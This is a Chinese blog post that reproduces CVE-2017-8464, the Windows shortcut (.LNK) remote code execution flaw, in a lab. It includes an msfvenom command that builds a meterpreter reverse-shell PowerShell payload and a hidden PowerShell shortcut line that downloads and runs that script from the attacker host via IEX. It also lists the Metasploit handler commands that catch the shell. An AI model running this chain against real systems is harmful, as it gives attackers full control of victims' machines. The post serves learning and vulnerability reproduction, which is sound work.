CVE-2017-8464远程命令执行漏洞(震网漏洞)复现

最新推荐文章于 2024-07-05 10:55:36 发布
最新推荐文章于 2024-07-05 10:55:36 发布
阅读量1.8k 收藏 4
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kuiguowei/article/details/79070969
版权
2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
漏洞描述

攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。
注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。
漏洞利用条件和方式: 
远程利用
漏洞影响范围: 
  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 10 version 1511 for 32-bit Systems
  • Microsoft Windows 10 version 1511 for x64-based Systems
  • Microsoft Windows 10 version 1703 for 32-bit Systems
  • Microsoft Windows 10 version 1703 for x64-based Systems
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 8.1 for x64-based Systems
  • Microsoft Windows RT 8.1
服务器系统
  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016
漏洞复现:
利用原理
创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒。
环境搭建
攻击机:kali  ip:10.0.0.140
目标靶机:win2008r2x64 ip:192.168.99.104
1.kali下生成一个反弹的 ps1的shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost= 10.0 . 0.140 lport= 5555 -f psh-reflection>/opt/search.ps1
2.切换到opt目录,然后查看到已生成了search.ps1 的powershell 后门
cd /opt

3.将生成的search.ps1拷贝到/var/www/html目录下
mv search.ps1 / var /www/html
4.启动apache服务
service apache2 start
 
5.访问web下的search.ps1,可以直接访问:
 
 
6.在靶机上创建一个powershell远程快捷:
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.140/search.ps1');test.ps1"
7.名称为:powershell.exe
 
8.kali下创建监听反弹,并且可以看到成功反弹出靶机的shell:
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcpshow options set LHOST 10.0 . 0.140 set lport 5555 exploit
 
kuiguowei
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2017-8464远程命令执行漏洞复现
m0_48520508的博客
01-13 292
0x00漏洞概述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。注:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。 Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用.
CVE-2017-8464(远程执行命令)漏洞复现
RongChun的博客
01-04 1066
漏洞复现: 利用原理: 创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒。 漏洞影响范围: • Microsoft Windows 10 Version 1607 for 32-bit Systems • Microsoft Windows 10 Version 1607 for x64-based Systems • Microsoft Windows 10 for 32-b...
cve-2017-7269-iis6.0环境搭建及复现过程
04-30
cve-2017-7269-iis6.0环境搭建及复现过程 有详细的复现过程。及出错记录
Windows服务漏洞——利用CVE-2017-8464漏洞实现LNK文件远程代码执行
ssm200400的博客
04-07 803
此外,确保您的SSH服务器配置正确,并且远程主机上的SSH服务正在运行。如果您在连接时遇到任何问题,检查SSH服务的日志文件通常是一个好方法,它们可以提供关于连接尝试的详细信息以及可能发生的任何错误。一旦SSH服务器运行并且端口22开放,您就可以使用命令行工具(如cmd或PowerShell)来进行SSH连接了。ctrl+shift+Esc 打开任务管理器(或者ctrl+alt+delete)如果您之前未配置防火墙以允许通过22端口的SSH连接,您可以使用。
CentOS7 下 修复 OpenSSH爆高危漏洞(CVE-2024-6387) 实践
最新发布
07-05 2747
OpenSSH远程代码执行漏洞 centOS7 下修复漏洞
CVE-2017-8464震网三代)漏洞分析与复现
dgjkkhcf的博客
07-22 3989
2017年6月13日,微软官方发布编号为CVE-2017-8464漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。......
CVE-2017-10271(WebLogic XMLDecoder反序列化漏洞)
deginner2的博客
07-29 4848
CVE-2017-10271(WebLogic XMLDecoder反序列化漏洞)
CVE-2017-8464震网3.0漏洞分析与复现
weixin_45484297的博客
03-29 2185
概述:微软在2017年6月份的补丁中修补了一个快捷方式(CVE-2107-8464)的漏洞,公告称此漏洞被国家背景的网络攻击所使用来实施攻击,该漏洞也被称为震网三代,随后Metasploit上发布了该漏洞的PoC。官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。本次实验主要分为漏洞复现和poc原理分析两部分,通过实验理清该漏洞可能的的攻击途径以及如何防护。 1.漏洞介绍 该漏洞的原理同2010年美国和以色列入
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
weblogic CVE 2017-10271
ChenD的学习笔记
05-22 1887
将输出重定向到当前循环的Branding_Login_WeblogicConsole.gif文件的同级目录下的pwd.txt文件,因为可以访问到该图片,所以能访问到创建的文件。这里随便找一个可访问的文件,访问192.168.27.128:7001/console,进入到登陆页面,右键查看源代码,随便找一个图片或文件的链接,这就搞到了可访问的文件名。这条命令的意思是,找到所有叫Branding_Login_WeblogicConsole.gif的文件,循环读取,每次循环 执行 id;ifconfig命令
CVE-2017-10271复现
qq_56258713的博客
07-03 3051
CVE-2017-10271复现
CVE-2017-10271
weixin_65722679的博客
06-25 340
CVE-2017-10271 【vulhub 漏洞复现
【网络安全---漏洞复现】Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271)
m0_67844671的博客
09-13 674
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271);​ Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令
CVE-2017-7269(iis6.0远程代码执行漏洞复现
热门推荐
Fly_鹏程万里
05-04 1万+
前言趁着有时间,没事干,无聊!所以就拿CVE-2017-7269做一个简单的漏洞复现实战演练!下面就对该漏洞进行简单的简介以及复现漏洞描述漏洞编号:CVE-2017-7269发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)漏洞描述:IIS 6.0默认不开启WebDAV,一旦开启了WebDAV支持,安装了IIS6.0的服务器将可能受到该漏洞...
CVE-2017-17215 HG532e 远程命令执行漏洞分析
tigerOrtiger的博客
11-10 3491
CVE-2017-17215 HG532e 远程命令执行漏洞分析 0x01 前言 HG532e 是华为的一款无线路由器。 这个漏洞是由蜜罐捕获到payload 之后,才被checkpoint 披露出来的。 这都是好几年前的洞了,但是可以作为分析固件,模拟固件很好的学习例子。 接下来跟我一起来体验跑固件的乐趣吧 …QAQ happy hacking !!! 0x02 搭建固件模拟环境 首先固件模拟,需要现成的固件 下载链接 HG532e 下载不了可以留言给我。 固件模拟这里有两种方式: 一种是 利用现有
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值